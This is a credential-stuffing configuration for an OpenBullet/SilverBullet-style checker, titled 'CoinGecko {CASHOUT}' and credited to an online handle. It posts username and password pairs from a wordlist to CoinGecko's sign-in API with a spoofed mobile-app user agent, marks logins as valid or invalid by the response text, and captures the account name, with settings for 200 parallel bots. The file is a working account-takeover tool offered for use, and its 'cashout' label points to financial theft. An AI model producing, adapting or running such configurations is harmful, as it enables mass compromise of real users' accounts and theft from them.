[SETTINGS]
{
  "Name": "CoinGecko {CASHOUT}",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2021-10-02T04:34:46.030854-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@MasterLord007",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "CoinGecko {CASHOUT}",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#USER FUNCTION URLEncode "<USER>" -> VAR "US" 

#PASS FUNCTION URLEncode "<PASS>" -> VAR "PS" 

#LOGIN REQUEST POST "https://api.coingecko.com/api/v3/auth/sign_in" 
  CONTENT "email=<US>&password=<PS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: api.coingecko.com" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Connection: keep-alive" 
  HEADER "mode: cors" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-us" 
  HEADER "Accept-Encoding: br, gzip, deflate" 
  HEADER "User-Agent: CoinGecko/317 CFNetwork/978.0.7 Darwin/18.7.0" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"data\"" 
  KEYCHAIN Failure OR 
    KEY "Invalid login credentials. Please try again." 

#NAME PARSE "<SOURCE>" JSON "name" CreateEmpty=FALSE -> CAP "Name" 

#CREATOR FUNCTION Constant "@MasterLord007" -> CAP "Config By" 

